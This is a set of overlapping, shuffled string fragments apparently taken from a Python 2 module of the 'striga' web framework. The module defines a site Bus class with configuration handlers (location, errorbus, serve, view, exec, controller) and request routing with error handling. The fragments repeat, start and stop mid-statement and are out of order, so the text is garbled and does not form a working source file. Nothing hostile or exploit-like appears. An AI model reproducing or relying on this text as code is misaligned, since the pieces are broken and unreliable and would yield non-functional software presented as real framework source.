"striga.core.exception.StrigaConfigurationError(\"Bus item for '%s' is already configured!\" % path) nbi = createitemfnct() self.CrossroadBusItems[path]", "defs = {} for key, fn in self.CustomSiteBusDefs.iteritems(): defs[key] = functools.partial(fn, self) defs.update({", ": self.__configure_componentbus, '!' : self._configure_finished, }) return defs def __configure_location(self, conffilename, path =", "hasattr(self.DefaultBusItem, 'BusStart'): self.DefaultBusItem.BusStart() if self.ErrorBus is not None: self.ErrorBus.BusStart() def BusStop(self): if self.ErrorBus", "''' from ._stsvcsb_location import Location l = self._InsertBusItem(path, Location) rootdir = os.path.join(self.RootDir, rootdir)", "self.ErrorBus(ctx, epath) return False except: L.exception(\"Exception during error bus processing:\") raise prev_excvalue else:", "path) if self.CrossroadBusItems.has_key(path): raise striga.core.exception.StrigaConfigurationError(\"Bus item for '%s' is already configured!\" % path)", "l = self._InsertBusItem(path, Location) rootdir = os.path.join(self.RootDir, rootdir) return l._configure(conffilename = conffilename, index", "'controller' : self.__configure_controller, 'componentbus' : self.__configure_componentbus, '!' 
: self._configure_finished, }) return defs def", "if isinstance(ctx.err.excvalue, striga.core.exception.StrigaBusError): epath = ctx.err.excvalue.Name else: L.exception(\"Generic exception during bus processing (you", "import Serve self._InsertBusItem(path, functools.partial(Serve, self.RootDir, pattern, buffersize)) def __configure_view(self, conffilename, source, mode, path", "= copy.copy(ctx.err.excvalue) if self.ErrorBus is not None: if isinstance(ctx.err.excvalue, striga.core.exception.StrigaBusError): epath = ctx.err.excvalue.Name", "buffersize = 64*1024): ''' Config keyword - serve ''' from ._stsvcsb_serve import Serve", "self.IntroBusItems: if hasattr(bm, 'BusStop'): bm.BusStop() ### def BusVar(name, default, ctx, path): if len(path)", ": self.__configure_serve, 'view' : self.__configure_view, 'exec' : self.__configure_exec, 'controller' : self.__configure_controller, 'componentbus' :", "- can be None as location can be default sitebus item too '''", "'BusStop'): self.DefaultBusItem.BusStop() for bm in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStop'): bm.BusStop() for bm in", "is already configured!\") self.DefaultBusItem = createitemfnct() return self.DefaultBusItem if self.PathCheckRE.match(path) is None: raise", "bm in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStop'): bm.BusStop() for bm in self.IntroBusItems: if hasattr(bm,", "rootdir) return self.ErrorBus._configure(conffilename = conffilename, rootdir = rootdir) def __configure_var(self, conffilename, name, default", "self.ErrorBus.BusStart() def BusStop(self): if self.ErrorBus is not None: self.ErrorBus.BusStop() if (self.DefaultBusItem is not", "path is None: if self.DefaultBusItem is not None: raise striga.core.exception.StrigaConfigurationError(\"Default bus item is", "''' from ._stsvcsb_view import View self._InsertBusItem(path, functools.partial(View, self.RootDir, source, mode, entry, pathlimit)) def", "bm(ctx, path) except 
striga.core.exception._StrigaClientRedirectBase: # Redirections are not solved thru ErrorBus raise except:", "if self.ErrorBus is not None: L.warning(\"Bus item has already one errorbus defined -", "path = None, entry='main', pathlimit='==0'): ''' Config keyword - view ''' from ._stsvcsb_view", "solved thru ErrorBus raise except: ctx.err.exctype, ctx.err.excvalue = sys.exc_info()[:2] prev_excvalue = copy.copy(ctx.err.excvalue) if", "BusVar(name, default, ctx, path): if len(path) == 0: raise striga.core.exception.StrigaBusError('NotFound') val = path.pop(0)", "self.CrossroadBusItems self.RootDir = None self.Index = None self.ErrorBus = None def _InsertBusItem(self, path,", "= None self.Index = None self.ErrorBus = None def _InsertBusItem(self, path, createitemfnct): if", "= index defs = {} for key, fn in self.CustomSiteBusDefs.iteritems(): defs[key] = functools.partial(fn,", "for key, fn in self.CustomSiteBusDefs.iteritems(): defs[key] = functools.partial(fn, self) defs.update({ 'location' : self.__configure_location,", "== 0: if self.Index is not None: path.append(self.Index) else: raise striga.core.exception.StrigaBusError(\"NotFound\") #Then find", "conffilename, source, entry, path = None, pathlimit = '==0', rootdir = '.'): '''", "default)) def __configure_serve(self, conffilename, pattern, path = None, buffersize = 64*1024): ''' Config", "None: if isinstance(ctx.err.excvalue, striga.core.exception.StrigaBusError): epath = ctx.err.excvalue.Name else: L.exception(\"Generic exception during bus processing", "conffilename, source, mode, path = None, entry='main', pathlimit='==0'): ''' Config keyword - view", "os.path.dirname(conffilename) self.RootDir = os.path.normpath(os.path.abspath(rootdir)) if not os.path.isdir(self.RootDir): if os.path.exists(self.RootDir): L.warning(\"Bus item root directory", "import ComponentBusRef self._InsertBusItem(path, functools.partial(ComponentBusRef, component, busname)) def __configure_exec(self, conffilename, source, entry, path 
=", "conffilename, rootdir = '.'): if self.ErrorBus is not None: L.warning(\"Bus item has already", "bm = self.DefaultBusItem if bm is None: L.warning(\"Site bus path not found: {0}\".format(path))", "#Iterate thru this (call each) in the begining self.CrossroadBusItems = {} #Check path", "__configure_controller(self, conffilename, source, controllerclass = 'Controller', path = None, pathlimit = '==0', rootdir", "os.path.join(self.RootDir, rootdir) self._InsertBusItem(path, functools.partial(Exec, rootdir, source, entry, pathlimit)) def __configure_controller(self, conffilename, source, controllerclass", "rootdir) def __configure_var(self, conffilename, name, default = 0): self.IntroBusItems.append(functools.partial(BusVar, name, default)) def __configure_serve(self,", "raise striga.core.exception.StrigaBusError(\"NotFound\") #Then find item in CrossroadBusItems & DefaultBusItem bm = self.CrossroadBusItems.get(path[0], None)", "errorbus defined - overwriting\") from ._stsvcsb_errorbus import ErrorBus self.ErrorBus = ErrorBus() rootdir =", "sys.exc_info()[:2] prev_excvalue = copy.copy(ctx.err.excvalue) if self.ErrorBus is not None: if isinstance(ctx.err.excvalue, striga.core.exception.StrigaBusError): epath", "= None, rootdir = None): if rootdir is None: rootdir = os.path.dirname(conffilename) self.RootDir", "conffilename, index = None, rootdir = None): if rootdir is None: rootdir =", "pattern, buffersize)) def __configure_view(self, conffilename, source, mode, path = None, entry='main', pathlimit='==0'): '''", "createitemfnct() return self.DefaultBusItem if self.PathCheckRE.match(path) is None: raise striga.core.exception.StrigaConfigurationError(\"Invalid path '%s' given!\" %", "def __configure_view(self, conffilename, source, mode, path = None, entry='main', pathlimit='==0'): ''' Config keyword", "item in CrossroadBusItems & DefaultBusItem bm = self.CrossroadBusItems.get(path[0], None) if bm is None:", "_configure(self, conffilename, index = None, rootdir = 
None): if rootdir is None: rootdir", "in self.IntroBusItems: if hasattr(bm, 'BusStop'): bm.BusStop() ### def BusVar(name, default, ctx, path): if", "self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStart'): bm.BusStart() if (self.DefaultBusItem is not None) and hasattr(self.DefaultBusItem, 'BusStart'):", "None #Call when not found anything in self.CrossroadBusItems self.RootDir = None self.Index =", "os.path.normpath(os.path.abspath(rootdir)) if not os.path.isdir(self.RootDir): if os.path.exists(self.RootDir): L.warning(\"Bus item root directory is not directory:", "defs def __configure_location(self, conffilename, path = None, index = None, rootdir = '.'):", "= None, pathlimit = '==0', rootdir = '.'): ''' Config keyword - exec", "if os.path.exists(self.RootDir): L.warning(\"Bus item root directory is not directory: '%s'\" % (self.RootDir)) else:", "index, rootdir = rootdir) def __configure_errorbus(self, conffilename, rootdir = '.'): if self.ErrorBus is", "Location) rootdir = os.path.join(self.RootDir, rootdir) return l._configure(conffilename = conffilename, index = index, rootdir", "pathlimit = '==0', rootdir = '.'): ''' Config keyword - Controller ''' from", "raise striga.core.exception.StrigaBusError('NotFound') else: ctx.req.Vars.SITEBUS['LastPath'] = path.pop(0) bm(ctx, path) except striga.core.exception._StrigaClientRedirectBase: # Redirections are", "functools.partial(fn, self) defs.update({ 'location' : self.__configure_location, 'errorbus' : self.__configure_errorbus, 'var' : self.__configure_var, 'serve'", "self.IntroBusItems.append(functools.partial(BusVar, name, default)) def __configure_serve(self, conffilename, pattern, path = None, buffersize = 64*1024):", "def __configure_var(self, conffilename, name, default = 0): self.IntroBusItems.append(functools.partial(BusVar, name, default)) def __configure_serve(self, conffilename,", "component, path = None, busname = 'componentbus'): ''' Config keyword - componentbus '''", "controllerclass = 
'Controller', path = None, pathlimit = '==0', rootdir = '.'): '''", "''' from ._stsvcsb_serve import Serve self._InsertBusItem(path, functools.partial(Serve, self.RootDir, pattern, buffersize)) def __configure_view(self, conffilename,", "ErrorBus() rootdir = os.path.join(self.RootDir, rootdir) return self.ErrorBus._configure(conffilename = conffilename, rootdir = rootdir) def", "'componentbus'): ''' Config keyword - componentbus ''' from ._stsvcsb_compbusref import ComponentBusRef self._InsertBusItem(path, functools.partial(ComponentBusRef,", "self._configure_finished, }) return defs def __configure_location(self, conffilename, path = None, index = None,", "self.RootDir, pattern, buffersize)) def __configure_view(self, conffilename, source, mode, path = None, entry='main', pathlimit='==0'):", "is not None: L.warning(\"Bus item has already one errorbus defined - overwriting\") from", "def _InsertBusItem(self, path, createitemfnct): if path is None: if self.DefaultBusItem is not None:", "else: ctx.req.Vars.SITEBUS['LastPath'] = path.pop(0) bm(ctx, path) except striga.core.exception._StrigaClientRedirectBase: # Redirections are not solved", "bm in self.IntroBusItems: if hasattr(bm, 'BusStop'): bm.BusStop() ### def BusVar(name, default, ctx, path):", "L.exception(\"Generic exception during bus processing (you should use StrigaBusError exceptions)\") epath = str(ctx.err.exctype)", ": self.__configure_view, 'exec' : self.__configure_exec, 'controller' : self.__configure_controller, 'componentbus' : self.__configure_componentbus, '!' 
:", "rootdir = os.path.join(self.RootDir, rootdir) return l._configure(conffilename = conffilename, index = index, rootdir =", "'.'): ''' Config keyword - Controller ''' from ._stsvcsb_cntrlr import Controller rootdir =", "not None) and hasattr(self.DefaultBusItem, 'BusStart'): self.DefaultBusItem.BusStart() if self.ErrorBus is not None: self.ErrorBus.BusStart() def", "call item from that self.DefaultBusItem = None #Call when not found anything in", "return defs def __configure_location(self, conffilename, path = None, index = None, rootdir =", "__configure_exec(self, conffilename, source, entry, path = None, pathlimit = '==0', rootdir = '.'):", ": self.__configure_exec, 'controller' : self.__configure_controller, 'componentbus' : self.__configure_componentbus, '!' : self._configure_finished, }) return", "not None: L.warning(\"Bus item has already one errorbus defined - overwriting\") from ._stsvcsb_errorbus", "= 0): self.IntroBusItems.append(functools.partial(BusVar, name, default)) def __configure_serve(self, conffilename, pattern, path = None, buffersize", "Controller rootdir = os.path.join(self.RootDir, rootdir) nbi = self._InsertBusItem(path, functools.partial(Controller, rootdir, source, controllerclass, pathlimit))", "'==0', rootdir = '.'): ''' Config keyword - Controller ''' from ._stsvcsb_cntrlr import", "pathlimit)) def __configure_controller(self, conffilename, source, controllerclass = 'Controller', path = None, pathlimit =", "ctx, path): if len(path) == 0: raise striga.core.exception.StrigaBusError('NotFound') val = path.pop(0) if val", "for ibm in self.IntroBusItems: ibm(ctx, path) #Check again as IntroBusItems can change path", "found anything in self.CrossroadBusItems self.RootDir = None self.Index = None self.ErrorBus = None", "= os.path.normpath(os.path.abspath(rootdir)) if not os.path.isdir(self.RootDir): if os.path.exists(self.RootDir): L.warning(\"Bus item root directory is not", "._stsvcsb_compbusref import ComponentBusRef 
self._InsertBusItem(path, functools.partial(ComponentBusRef, component, busname)) def __configure_exec(self, conffilename, source, entry, path", "Exec rootdir = os.path.join(self.RootDir, rootdir) self._InsertBusItem(path, functools.partial(Exec, rootdir, source, entry, pathlimit)) def __configure_controller(self,", "path array if len(path) == 0: if self.Index is not None: path.append(self.Index) else:", "in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStart'): bm.BusStart() if (self.DefaultBusItem is not None) and hasattr(self.DefaultBusItem,", "is None: rootdir = os.path.dirname(conffilename) self.RootDir = os.path.normpath(os.path.abspath(rootdir)) if not os.path.isdir(self.RootDir): if os.path.exists(self.RootDir):", "re.compile(r'^[^//]*$') def __init__(self): self.IntroBusItems = [] #Iterate thru this (call each) in the", "striga.core.exception.StrigaBusError('NotFound') val = path.pop(0) if val == '': val = default ctx.req.Vars.SITEBUS[name] =", "isinstance(ctx.err.excvalue, striga.core.exception.StrigaBusError): epath = ctx.err.excvalue.Name else: L.exception(\"Generic exception during bus processing (you should", "self._InsertBusItem(path, Location) rootdir = os.path.join(self.RootDir, rootdir) return l._configure(conffilename = conffilename, index = index,", "anything in self.CrossroadBusItems self.RootDir = None self.Index = None self.ErrorBus = None def", "for bm in self.IntroBusItems: if hasattr(bm, 'BusStop'): bm.BusStop() ### def BusVar(name, default, ctx,", "path): ''' Entry point to this bus object ''' SiteBusVar = ctx.req.Vars.SITEBUS SiteBusVar['RootDir']", "if self.ErrorBus is not None: if isinstance(ctx.err.excvalue, striga.core.exception.StrigaBusError): epath = ctx.err.excvalue.Name else: L.exception(\"Generic", "Config keyword - componentbus ''' from ._stsvcsb_compbusref import ComponentBusRef self._InsertBusItem(path, functools.partial(ComponentBusRef, component, busname))", "#Then find item in CrossroadBusItems & DefaultBusItem 
bm = self.CrossroadBusItems.get(path[0], None) if bm", "StrigaBusError exceptions)\") epath = str(ctx.err.exctype) try: self.ErrorBus(ctx, epath) return False except: L.exception(\"Exception during", "self.Index = None self.ErrorBus = None def _InsertBusItem(self, path, createitemfnct): if path is", "None) and hasattr(self.DefaultBusItem, 'BusStop'): self.DefaultBusItem.BusStop() for bm in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStop'): bm.BusStop()", "conffilename, path = None, index = None, rootdir = '.'): ''' @param path", "#Call when not found anything in self.CrossroadBusItems self.RootDir = None self.Index = None", "rootdir) self._InsertBusItem(path, functools.partial(Exec, rootdir, source, entry, pathlimit)) def __configure_controller(self, conffilename, source, controllerclass =", "self.ErrorBus is not None: if isinstance(ctx.err.excvalue, striga.core.exception.StrigaBusError): epath = ctx.err.excvalue.Name else: L.exception(\"Generic exception", "#Check again as IntroBusItems can change path array if len(path) == 0: if", "self.__configure_serve, 'view' : self.__configure_view, 'exec' : self.__configure_exec, 'controller' : self.__configure_controller, 'componentbus' : self.__configure_componentbus,", "nbi._configure(conffilename = conffilename) def _configure_finished(self): pass def __call__(self, ctx, path): ''' Entry point", "nbi = createitemfnct() self.CrossroadBusItems[path] = nbi return nbi def _configure(self, conffilename, index =", "= 'componentbus'): ''' Config keyword - componentbus ''' from ._stsvcsb_compbusref import ComponentBusRef self._InsertBusItem(path,", "component, busname)) def __configure_exec(self, conffilename, source, entry, path = None, pathlimit = '==0',", "__init__(self): self.IntroBusItems = [] #Iterate thru this (call each) in the begining self.CrossroadBusItems", "= conffilename, index = index, rootdir = rootdir) def __configure_errorbus(self, conffilename, rootdir =", "self.DefaultBusItem if 
self.PathCheckRE.match(path) is None: raise striga.core.exception.StrigaConfigurationError(\"Invalid path '%s' given!\" % path) if", "._stsvcsb_errorbus import ErrorBus self.ErrorBus = ErrorBus() rootdir = os.path.join(self.RootDir, rootdir) return self.ErrorBus._configure(conffilename =", "exceptions)\") epath = str(ctx.err.exctype) try: self.ErrorBus(ctx, epath) return False except: L.exception(\"Exception during error", "keyword - exec ''' from ._stsvcsb_exec import Exec rootdir = os.path.join(self.RootDir, rootdir) self._InsertBusItem(path,", "root directory is not directory: '%s'\" % (self.RootDir)) else: L.warning(\"Bus item root directory", "BusStop(self): if self.ErrorBus is not None: self.ErrorBus.BusStop() if (self.DefaultBusItem is not None) and", "functools, copy, logging as L import striga.core.exception ### class Bus(object): CustomSiteBusDefs = {}", "L.warning(\"Bus item has already one errorbus defined - overwriting\") from ._stsvcsb_errorbus import ErrorBus", "thru this (call each) in the begining self.CrossroadBusItems = {} #Check path against", "._stsvcsb_location import Location l = self._InsertBusItem(path, Location) rootdir = os.path.join(self.RootDir, rootdir) return l._configure(conffilename", "from that self.DefaultBusItem = None #Call when not found anything in self.CrossroadBusItems self.RootDir", "= re.compile(r'^[^//]*$') def __init__(self): self.IntroBusItems = [] #Iterate thru this (call each) in", "defs.update({ 'location' : self.__configure_location, 'errorbus' : self.__configure_errorbus, 'var' : self.__configure_var, 'serve' : self.__configure_serve,", "not None: self.ErrorBus.BusStart() def BusStop(self): if self.ErrorBus is not None: self.ErrorBus.BusStop() if (self.DefaultBusItem", "0): self.IntroBusItems.append(functools.partial(BusVar, name, default)) def __configure_serve(self, conffilename, pattern, path = None, buffersize =", "import View self._InsertBusItem(path, functools.partial(View, self.RootDir, source, mode, entry, 
pathlimit)) def __configure_componentbus(self, conffilename, component,", "return l._configure(conffilename = conffilename, index = index, rootdir = rootdir) def __configure_errorbus(self, conffilename,", "self.IntroBusItems: ibm(ctx, path) #Check again as IntroBusItems can change path array if len(path)", "thru IntroBusItems for ibm in self.IntroBusItems: ibm(ctx, path) #Check again as IntroBusItems can", "__configure_componentbus(self, conffilename, component, path = None, busname = 'componentbus'): ''' Config keyword -", "if self.ErrorBus is not None: self.ErrorBus.BusStop() if (self.DefaultBusItem is not None) and hasattr(self.DefaultBusItem,", "}) return defs def __configure_location(self, conffilename, path = None, index = None, rootdir", "rootdir = rootdir) def __configure_errorbus(self, conffilename, rootdir = '.'): if self.ErrorBus is not", "item has already one errorbus defined - overwriting\") from ._stsvcsb_errorbus import ErrorBus self.ErrorBus", "if path is None: if self.DefaultBusItem is not None: raise striga.core.exception.StrigaConfigurationError(\"Default bus item", "64*1024): ''' Config keyword - serve ''' from ._stsvcsb_serve import Serve self._InsertBusItem(path, functools.partial(Serve,", "source, mode, entry, pathlimit)) def __configure_componentbus(self, conffilename, component, path = None, busname =", "= None, busname = 'componentbus'): ''' Config keyword - componentbus ''' from ._stsvcsb_compbusref", "CrossroadBusItems & DefaultBusItem bm = self.CrossroadBusItems.get(path[0], None) if bm is None: bm =", "str(ctx.err.exctype) try: self.ErrorBus(ctx, epath) return False except: L.exception(\"Exception during error bus processing:\") raise", "._stsvcsb_serve import Serve self._InsertBusItem(path, functools.partial(Serve, self.RootDir, pattern, buffersize)) def __configure_view(self, conffilename, source, mode,", "path) #Check again as IntroBusItems can change path array if len(path) == 0:", "against this, if ok, call item from that 
self.DefaultBusItem = None #Call when", "= sys.exc_info()[:2] prev_excvalue = copy.copy(ctx.err.excvalue) if self.ErrorBus is not None: if isinstance(ctx.err.excvalue, striga.core.exception.StrigaBusError):", "striga.core.exception.StrigaBusError): epath = ctx.err.excvalue.Name else: L.exception(\"Generic exception during bus processing (you should use", "self.ErrorBus is not None: self.ErrorBus.BusStop() if (self.DefaultBusItem is not None) and hasattr(self.DefaultBusItem, 'BusStop'):", "if self.DefaultBusItem is not None: raise striga.core.exception.StrigaConfigurationError(\"Default bus item is already configured!\") self.DefaultBusItem", "too ''' from ._stsvcsb_location import Location l = self._InsertBusItem(path, Location) rootdir = os.path.join(self.RootDir,", "is not directory: '%s'\" % (self.RootDir)) else: L.warning(\"Bus item root directory doesn't exist:", "buffersize)) def __configure_view(self, conffilename, source, mode, path = None, entry='main', pathlimit='==0'): ''' Config", "{} for key, fn in self.CustomSiteBusDefs.iteritems(): defs[key] = functools.partial(fn, self) defs.update({ 'location' :", "keyword - Controller ''' from ._stsvcsb_cntrlr import Controller rootdir = os.path.join(self.RootDir, rootdir) nbi", "object ''' SiteBusVar = ctx.req.Vars.SITEBUS SiteBusVar['RootDir'] = self.RootDir SiteBusVar['Location'] = self try: #First", "should use StrigaBusError exceptions)\") epath = str(ctx.err.exctype) try: self.ErrorBus(ctx, epath) return False except:", "striga.core.exception.StrigaConfigurationError(\"Default bus item is already configured!\") self.DefaultBusItem = createitemfnct() return self.DefaultBusItem if self.PathCheckRE.match(path)", ": self.__configure_location, 'errorbus' : self.__configure_errorbus, 'var' : self.__configure_var, 'serve' : self.__configure_serve, 'view' :", "busname = 'componentbus'): ''' Config keyword - componentbus ''' from ._stsvcsb_compbusref import ComponentBusRef", "ctx.err.exctype, ctx.err.excvalue = 
sys.exc_info()[:2] prev_excvalue = copy.copy(ctx.err.excvalue) if self.ErrorBus is not None: if", "during error bus processing:\") raise prev_excvalue else: raise def BusStart(self): for bm in", "raise except: ctx.err.exctype, ctx.err.excvalue = sys.exc_info()[:2] prev_excvalue = copy.copy(ctx.err.excvalue) if self.ErrorBus is not", "self.DefaultBusItem if bm is None: L.warning(\"Site bus path not found: {0}\".format(path)) raise striga.core.exception.StrigaBusError('NotFound')", "self.__configure_controller, 'componentbus' : self.__configure_componentbus, '!' : self._configure_finished, }) return defs def __configure_location(self, conffilename,", "self.__configure_exec, 'controller' : self.__configure_controller, 'componentbus' : self.__configure_componentbus, '!' : self._configure_finished, }) return defs", "def BusStart(self): for bm in self.IntroBusItems: if hasattr(bm, 'BusStart'): bm.BusStart() for bm in", "{} #Check path against this, if ok, call item from that self.DefaultBusItem =", "is not None) and hasattr(self.DefaultBusItem, 'BusStop'): self.DefaultBusItem.BusStop() for bm in self.CrossroadBusItems.itervalues(): if hasattr(bm,", "and hasattr(self.DefaultBusItem, 'BusStop'): self.DefaultBusItem.BusStop() for bm in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStop'): bm.BusStop() for", "if bm is None: L.warning(\"Site bus path not found: {0}\".format(path)) raise striga.core.exception.StrigaBusError('NotFound') else:", "return nbi._configure(conffilename = conffilename) def _configure_finished(self): pass def __call__(self, ctx, path): ''' Entry", "### class Bus(object): CustomSiteBusDefs = {} PathCheckRE = re.compile(r'^[^//]*$') def __init__(self): self.IntroBusItems =", "self.RootDir = None self.Index = None self.ErrorBus = None def _InsertBusItem(self, path, createitemfnct):", "rootdir) nbi = self._InsertBusItem(path, functools.partial(Controller, rootdir, source, controllerclass, pathlimit)) return nbi._configure(conffilename = 
conffilename)", "None) and hasattr(self.DefaultBusItem, 'BusStart'): self.DefaultBusItem.BusStart() if self.ErrorBus is not None: self.ErrorBus.BusStart() def BusStop(self):", "item for '%s' is already configured!\" % path) nbi = createitemfnct() self.CrossroadBusItems[path] =", "= '==0', rootdir = '.'): ''' Config keyword - exec ''' from ._stsvcsb_exec", "= None, pathlimit = '==0', rootdir = '.'): ''' Config keyword - Controller", "entry, pathlimit)) def __configure_componentbus(self, conffilename, component, path = None, busname = 'componentbus'): '''", "be None as location can be default sitebus item too ''' from ._stsvcsb_location", "path = None, buffersize = 64*1024): ''' Config keyword - serve ''' from", "in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStop'): bm.BusStop() for bm in self.IntroBusItems: if hasattr(bm, 'BusStop'):", "ctx.req.Vars.SITEBUS['LastPath'] = path.pop(0) bm(ctx, path) except striga.core.exception._StrigaClientRedirectBase: # Redirections are not solved thru", "import ErrorBus self.ErrorBus = ErrorBus() rootdir = os.path.join(self.RootDir, rootdir) return self.ErrorBus._configure(conffilename = conffilename,", "for bm in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStart'): bm.BusStart() if (self.DefaultBusItem is not None)", "bus item is already configured!\") self.DefaultBusItem = createitemfnct() return self.DefaultBusItem if self.PathCheckRE.match(path) is", "iterate thru IntroBusItems for ibm in self.IntroBusItems: ibm(ctx, path) #Check again as IntroBusItems", "= functools.partial(fn, self) defs.update({ 'location' : self.__configure_location, 'errorbus' : self.__configure_errorbus, 'var' : self.__configure_var,", "ctx, path): ''' Entry point to this bus object ''' SiteBusVar = ctx.req.Vars.SITEBUS", "'%s' given!\" % path) if self.CrossroadBusItems.has_key(path): raise striga.core.exception.StrigaConfigurationError(\"Bus item for '%s' is already", "functools.partial(Exec, rootdir, source, entry, pathlimit)) 
def __configure_controller(self, conffilename, source, controllerclass = 'Controller', path", "def BusVar(name, default, ctx, path): if len(path) == 0: raise striga.core.exception.StrigaBusError('NotFound') val =", "None: bm = self.DefaultBusItem if bm is None: L.warning(\"Site bus path not found:", "self.CustomSiteBusDefs.iteritems(): defs[key] = functools.partial(fn, self) defs.update({ 'location' : self.__configure_location, 'errorbus' : self.__configure_errorbus, 'var'", "(self.RootDir)) self.Index = index defs = {} for key, fn in self.CustomSiteBusDefs.iteritems(): defs[key]", "IntroBusItems for ibm in self.IntroBusItems: ibm(ctx, path) #Check again as IntroBusItems can change", "self.CrossroadBusItems = {} #Check path against this, if ok, call item from that", "is not None: raise striga.core.exception.StrigaConfigurationError(\"Default bus item is already configured!\") self.DefaultBusItem = createitemfnct()", "'serve' : self.__configure_serve, 'view' : self.__configure_view, 'exec' : self.__configure_exec, 'controller' : self.__configure_controller, 'componentbus'", ": self.__configure_var, 'serve' : self.__configure_serve, 'view' : self.__configure_view, 'exec' : self.__configure_exec, 'controller' :", "be default sitebus item too ''' from ._stsvcsb_location import Location l = self._InsertBusItem(path,", "= None, buffersize = 64*1024): ''' Config keyword - serve ''' from ._stsvcsb_serve", "epath = ctx.err.excvalue.Name else: L.exception(\"Generic exception during bus processing (you should use StrigaBusError", "index = None, rootdir = '.'): ''' @param path - can be None", "if hasattr(bm, 'BusStop'): bm.BusStop() ### def BusVar(name, default, ctx, path): if len(path) ==", "if len(path) == 0: raise striga.core.exception.StrigaBusError('NotFound') val = path.pop(0) if val == '':", "not solved thru ErrorBus raise except: ctx.err.exctype, ctx.err.excvalue = sys.exc_info()[:2] prev_excvalue = copy.copy(ctx.err.excvalue)", "as L import striga.core.exception ### 
class Bus(object): CustomSiteBusDefs = {} PathCheckRE = re.compile(r'^[^//]*$')", "striga.core.exception.StrigaConfigurationError(\"Invalid path '%s' given!\" % path) if self.CrossroadBusItems.has_key(path): raise striga.core.exception.StrigaConfigurationError(\"Bus item for '%s'", "pattern, path = None, buffersize = 64*1024): ''' Config keyword - serve '''", "from ._stsvcsb_view import View self._InsertBusItem(path, functools.partial(View, self.RootDir, source, mode, entry, pathlimit)) def __configure_componentbus(self,", "source, mode, path = None, entry='main', pathlimit='==0'): ''' Config keyword - view '''", "self.RootDir = os.path.normpath(os.path.abspath(rootdir)) if not os.path.isdir(self.RootDir): if os.path.exists(self.RootDir): L.warning(\"Bus item root directory is", "def __configure_controller(self, conffilename, source, controllerclass = 'Controller', path = None, pathlimit = '==0',", "= '.'): ''' Config keyword - Controller ''' from ._stsvcsb_cntrlr import Controller rootdir", "ibm in self.IntroBusItems: ibm(ctx, path) #Check again as IntroBusItems can change path array", "not None) and hasattr(self.DefaultBusItem, 'BusStop'): self.DefaultBusItem.BusStop() for bm in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStop'):", "default, ctx, path): if len(path) == 0: raise striga.core.exception.StrigaBusError('NotFound') val = path.pop(0) if", "is None: L.warning(\"Site bus path not found: {0}\".format(path)) raise striga.core.exception.StrigaBusError('NotFound') else: ctx.req.Vars.SITEBUS['LastPath'] =", "IntroBusItems can change path array if len(path) == 0: if self.Index is not", "rootdir = '.'): ''' Config keyword - Controller ''' from ._stsvcsb_cntrlr import Controller", "conffilename, component, path = None, busname = 'componentbus'): ''' Config keyword - componentbus", "from ._stsvcsb_location import Location l = self._InsertBusItem(path, Location) rootdir = os.path.join(self.RootDir, rootdir) return", "SiteBusVar['Location'] = self try: 
#First iterate thru IntroBusItems for ibm in self.IntroBusItems: ibm(ctx,", "import striga.core.exception ### class Bus(object): CustomSiteBusDefs = {} PathCheckRE = re.compile(r'^[^//]*$') def __init__(self):", "self.RootDir, source, mode, entry, pathlimit)) def __configure_componentbus(self, conffilename, component, path = None, busname", "if (self.DefaultBusItem is not None) and hasattr(self.DefaultBusItem, 'BusStop'): self.DefaultBusItem.BusStop() for bm in self.CrossroadBusItems.itervalues():", "item root directory doesn't exist: '%s'\" % (self.RootDir)) self.Index = index defs =", "are not solved thru ErrorBus raise except: ctx.err.exctype, ctx.err.excvalue = sys.exc_info()[:2] prev_excvalue =", "% (self.RootDir)) else: L.warning(\"Bus item root directory doesn't exist: '%s'\" % (self.RootDir)) self.Index", "self.ErrorBus._configure(conffilename = conffilename, rootdir = rootdir) def __configure_var(self, conffilename, name, default = 0):", "bm is None: bm = self.DefaultBusItem if bm is None: L.warning(\"Site bus path", "path = None, pathlimit = '==0', rootdir = '.'): ''' Config keyword -", "epath = str(ctx.err.exctype) try: self.ErrorBus(ctx, epath) return False except: L.exception(\"Exception during error bus", "return self.ErrorBus._configure(conffilename = conffilename, rootdir = rootdir) def __configure_var(self, conffilename, name, default =", "pathlimit = '==0', rootdir = '.'): ''' Config keyword - exec ''' from", "bm.BusStop() for bm in self.IntroBusItems: if hasattr(bm, 'BusStop'): bm.BusStop() ### def BusVar(name, default,", "configured!\") self.DefaultBusItem = createitemfnct() return self.DefaultBusItem if self.PathCheckRE.match(path) is None: raise striga.core.exception.StrigaConfigurationError(\"Invalid path", "fn in self.CustomSiteBusDefs.iteritems(): defs[key] = functools.partial(fn, self) defs.update({ 'location' : self.__configure_location, 'errorbus' :", "from ._stsvcsb_exec import Exec rootdir = os.path.join(self.RootDir, rootdir) 
self._InsertBusItem(path, functools.partial(Exec, rootdir, source, entry,", "{0}\".format(path)) raise striga.core.exception.StrigaBusError('NotFound') else: ctx.req.Vars.SITEBUS['LastPath'] = path.pop(0) bm(ctx, path) except striga.core.exception._StrigaClientRedirectBase: # Redirections", "_InsertBusItem(self, path, createitemfnct): if path is None: if self.DefaultBusItem is not None: raise", "source, entry, pathlimit)) def __configure_controller(self, conffilename, source, controllerclass = 'Controller', path = None,", "bm.BusStart() for bm in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStart'): bm.BusStart() if (self.DefaultBusItem is not", "def __init__(self): self.IntroBusItems = [] #Iterate thru this (call each) in the begining", "= {} #Check path against this, if ok, call item from that self.DefaultBusItem", "self.CrossroadBusItems[path] = nbi return nbi def _configure(self, conffilename, index = None, rootdir =", "= nbi return nbi def _configure(self, conffilename, index = None, rootdir = None):", "else: raise def BusStart(self): for bm in self.IntroBusItems: if hasattr(bm, 'BusStart'): bm.BusStart() for", "self.Index = index defs = {} for key, fn in self.CustomSiteBusDefs.iteritems(): defs[key] =", "#Check path against this, if ok, call item from that self.DefaultBusItem = None", "None, entry='main', pathlimit='==0'): ''' Config keyword - view ''' from ._stsvcsb_view import View", "- Controller ''' from ._stsvcsb_cntrlr import Controller rootdir = os.path.join(self.RootDir, rootdir) nbi =", "rootdir = 